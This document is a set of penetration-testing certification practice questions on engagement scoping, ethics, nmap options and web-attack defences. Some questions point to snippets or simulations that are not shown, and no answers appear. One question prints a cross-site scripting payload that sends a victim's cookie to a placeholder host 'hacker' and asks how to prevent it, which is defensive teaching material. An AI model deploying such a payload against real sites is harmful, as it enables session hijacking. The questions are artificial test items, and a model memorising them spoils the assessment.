When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character combinations should be used on the first line of the script to accomplish this goal?
A. <#
B. <$
C.
D. #$
E. #!
A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment?
A. A signed statement of work
B. The correct user accounts and associated passwords
C. The expected time frame of the assessment
D. The proper emergency contacts for the client
A security engineer identified a new server on the network and wants to scan the host to determine if it is running an approved version of Linux and a patched version of Apache. Which of the following commands will accomplish this task?
A. nmap -f -sV -p80 192.168.1.20
B. nmap -sS -sL -p80 192.168.1.20
C. nmap -A -T4 -p80 192.168.1.20
D. nmap -O -v -p80 192.168.1.20
Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?
A. Analyze the malware to see what it does.
B. Collect the proper evidence and then remove the malware.
C. Do a root-cause analysis to find out how the malware got in.
D. Remove the malware immediately.
E. Stop the assessment and inform the emergency contact.
A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task?
A. Run nmap with the -o, -p22, and -sC options set against the target
B. Run nmap with the -sV and -p22 options set against the target
C. Run nmap with the --script vulners option set against the target
D. Run nmap with the -sA option set against the target
During a penetration-testing engagement, a consultant performs reconnaissance of a client to identify potential targets for a phishing campaign. Which of the following would allow the consultant to retrieve email addresses for technical and billing contacts quickly, without triggering any of the client's cybersecurity tools? (Choose two.)
A. Scraping social media sites
B. Using the WHOIS lookup tool
C. Crawling the client's website
D. Phishing company employees
E. Utilizing DNS lookup tools
F. Conducting wardriving near the client facility
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:
Which of the following commands should the penetration tester run post-engagement?
A. grep -v apache ~/.bash_history > ~/.bash_history
B. rm -rf /tmp/apache
C. chmod 600 /tmp/apache
D. taskkill /IM "apache" /F
Which of the following describe the GREATEST concerns about using third-party open-source libraries in application code? (Choose two.)
A. The libraries may be vulnerable
B. The licensing of software is ambiguous
C. The libraries' code bases could be read by anyone
D. The provenance of code is unknown
E. The libraries may be unsupported
F. The libraries may break the application
Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment?
A. Whether the cloud service provider allows the penetration tester to test the environment
B. Whether the specific cloud services are being used by the application
C. The geographical location where the cloud services are running
D. Whether the country where the cloud service is based has any impeding laws
A penetration tester discovers that a web server within the scope of the engagement has already been compromised with a backdoor. Which of the following should the penetration tester do NEXT?
A. Forensically acquire the backdoor Trojan and perform attribution
B. Utilize the backdoor in support of the engagement
C. Continue the engagement and include the backdoor finding in the final report
D. Inform the customer immediately about the backdoor
A penetration tester is exploring a client's website. The tester performs a curl command and obtains the following:
Connected to 10.2.11.144 (::1) port 80 (#0)
> GET /readmine.html HTTP/1.1
> Host: 10.2.11.144
> User-Agent: curl/7.67.0
> Accept: */*
>
Mark bundle as not supporting multiuse
< HTTP/1.1 200
< Date: Tue, 02 Feb 2021 21:46:47 GMT
< Server: Apache/2.4.41 (Debian)
< Content-Length: 317
< Content-Type: text/html; charset=iso-8859-1
<
<!DOCTYPE html>
<html lang=en>
<head>
<meta name=viewport content=width=device-width />
<meta http-equiv=Content-Type content=text/html; charset=utf-8 />
<title>WordPress › ReadMe</title>
<link rel=stylesheet href=wp-admin/css/install.css?ver=20100228 type=text/css />
</head>
Which of the following tools would be BEST for the penetration tester to use to explore this site further?
A. Burp Suite
B. DirBuster
C. WPScan
D. OWASP ZAP
HOTSPOT -
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.
INSTRUCTIONS -
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Hot Area:
Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)
A. Buffer overflows
B. Cross-site scripting
C. Race-condition attacks
D. Zero-day attacks
E. Injection flaws
F. Ransomware attacks
Given the following code:
<SCRIPT>var+img=new+Image();img.src=`http://hacker/%20+%20document.cookie;</SCRIPT>
Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)
A. Web-application firewall
B. Parameterized queries
C. Output encoding
D. Session tokens
E. Input validation
F. Base64 encoding
A company that develops embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse-engineering team prior to approval of the subcontract. Which of the following concerns would BEST support the software company's request?
A. The reverse-engineering team may have a history of selling exploits to third parties.
B. The reverse-engineering team may use closed-source or other non-public information feeds for its analysis.
C. The reverse-engineering team may not instill safety protocols sufficient for the automobile industry.
D. The reverse-engineering team will be given access to source code for analysis.
A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity. Which of the following is the MOST important action to take before starting this type of assessment?
A. Ensure the client has signed the SOW.
B. Verify the client has granted network access to the hot site.
C. Determine if the failover environment relies on resources not owned by the client.
D. Establish communication and escalation procedures with the client.
Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?
A. NDA
B. MSA
C. SOW
D. MOU
A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?
A. Nmap
B. tcpdump
C. Scapy
D. hping3
A penetration tester wrote the following script to be used in one engagement:
Which of the following actions will this script perform?
A. Look for open ports.
B. Listen for a reverse shell.
C. Attempt to flood open ports.
D. Create an encrypted tunnel.
SIMULATION -
You are a penetration tester running port scans on a server.
INSTRUCTIONS -
Part 1: Given the output, construct the command that was used to generate this output from the available options.
Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
A penetration tester is reviewing the following SOW prior to engaging with a client: Network diagrams, logical and physical asset inventory, and employees' names are to be treated as client confidential. Upon completion of the engagement, the penetration tester will submit findings to the client's Chief Information Security Officer (CISO) via encrypted protocols and subsequently dispose of all findings by erasing them in a secure manner.
Based on the information in the SOW, which of the following behaviors would be considered unethical? (Choose two.)
A. Utilizing proprietary penetration-testing tools that are not available to the public or to the client for auditing and inspection
B. Utilizing public-key cryptography to ensure findings are delivered to the CISO upon completion of the engagement
C. Failing to share with the client critical vulnerabilities that exist within the client architecture to appease the client's senior leadership team
D. Seeking help with the engagement in underground hacker forums by sharing the client's public IP address
E. Using a software-based erase tool to wipe the client's findings from the penetration tester's laptop
F. Retaining the SOW within the penetration tester's company for future use so the sales team can plan future engagements
A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals. Which of the following should the tester do NEXT?
A. Reach out to the primary point of contact
B. Try to take down the attackers
C. Call law enforcement officials immediately
D. Collect the proper evidence and add to the final report
A penetration-testing team is conducting a physical penetration test to gain entry to a building. Which of the following is the reason why the penetration testers should carry copies of the engagement documents with them?
A. As backup in case the original documents are lost
B. To guide them through the building entrances
C. To validate the billing information with the client
D. As proof in case they are discovered
A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations. Which of the following are considered passive reconnaissance tools? (Choose two.)